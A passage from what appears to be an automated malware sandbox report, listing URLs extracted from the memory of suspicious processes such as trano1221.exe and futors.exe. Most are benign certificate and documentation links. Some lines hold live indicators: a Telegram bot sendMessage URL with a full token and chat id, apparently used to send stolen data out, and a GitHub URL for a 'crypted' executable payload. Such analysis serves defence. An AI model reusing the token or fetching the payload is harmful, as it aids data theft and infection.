0000002A.00000002.1946800540.000001E16BB66000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1811187330.000001E16BB5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timelessrepo.com/json-isnt-a-javascript-subset).
                                      Source: trano1221.exe, 0000002A.00000002.1950520854.000001E16C380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839236500.000001E16B56B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882867348.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893387743.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1942451950.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857850675.000001E16C602000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893642016.000001E16C604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857850675.000001E16C602000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893642016.000001E16C604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl4
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htmr
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                                      Source: trano1221.exe, 00000023.00000003.1609567595.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
                                      Source: trano1221.exe, 00000023.00000003.1610178975.0000013C2C402000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609567595.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609567595.0000013C2C401000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1610647899.0000013C2C402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D88022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                      Source: trano1221.exe, 0000002A.00000002.1949395926.000001E16BD20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1881513489.000001E16B527000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1851441531.000001E16C636000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1814171740.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                                      Source: trano1221.exe, 0000002A.00000003.1655158924.000001E16B5D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                      Source: trano1221.exe, 0000002A.00000003.1886267544.000001E16BC1F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1965623740.000001E16C65F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807134122.000001E16BC19000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883113833.000001E16BC1F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1840930520.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857007046.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                                      Source: trano1221.exe, 0000002A.00000003.1886267544.000001E16BC1F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807134122.000001E16BC19000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946483979.000001E16BAEA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883113833.000001E16BC1F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1970356972.000001E16CE30000.00000004.00001000.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883906457.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/character-sets
                                      Source: trano1221.exe, 0000002A.00000003.1839066325.000001E16BB73000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806684147.000001E16BB72000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1831815877.000001E16BB73000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                      Source: trano1221.exe, 0000002A.00000003.1655158924.000001E16B5D5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1667863628.000001E16B58E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1656139769.000001E16B567000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1658799975.000001E16B53F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
                                      Source: trano1221.exe, 0000002A.00000003.1655158924.000001E16B5D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857850675.000001E16C602000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893642016.000001E16C604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                                      Source: trano1221.exe, 0000002A.00000002.1941933794.000001E16B4E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1810044236.000001E16B648000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807329895.000001E16B5F1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888416044.000001E16B6C7000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815209048.000001E16B6C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                      Source: powershell.exe, 00000019.00000002.1586419592.0000000004871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBDr
                                      Source: trano1221.exe, 0000002A.00000002.1970356972.000001E16CDD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7591910367:AAEZrF_Cuy7JK2ZDu8tT43dHO_5Hk80CLJ0/sendMessage
                                      Source: trano1221.exe, 0000002A.00000002.1970356972.000001E16CE38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7591910367:AAEZrF_Cuy7JK2ZDu8tT43dHO_5Hk80CLJ0/sendMessage?chat_id=71057
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                                      Source: UD49QH6.exe, 00000010.00000003.1462695917.0000000005B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643957026.000001E16B639000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1655158924.000001E16B593000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1655061017.000001E16B639000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1646562116.000001E16B596000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1658799975.000001E16B59D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1683030296.000001E16B58E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822586944.000001E16B5A9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1715210481.000001E16B596000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1672685606.000001E16B53F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AEE8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AEE8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                                      Source: trano1221.exe, 0000002A.00000003.1811281205.000001E169697000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836271125.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1924598134.000001E1696A1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888194813.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1629342002.000001E169689000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891421330.000001E16969D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815054639.000001E16969B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
                                      Source: trano1221.exe, 0000002A.00000003.1880697620.000001E16B9FE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857175982.000001E16B9F7000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816650813.000001E16B9EC000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832695924.000001E16B9ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                                      Source: futors.exe, 0000000F.00000003.1632617370.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                                      Source: futors.exe, 0000000F.00000003.1811877759.0000000003F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Milidmdds/45rgffdgd/releases/download/fdgdf/crypted.7.exe
                                      Source: trano1221.exe, 0000002A.00000003.1807134122.000001E16BC19000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D88022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                      Source: trano1221.exe, 0000002A.00000003.1811281205.000001E169697000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836271125.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1924598134.000001E1696A1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888194813.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1629342002.000001E169689000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891421330.000001E16969D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1939610283.000001E16B2B4000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815054639.000001E16969B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 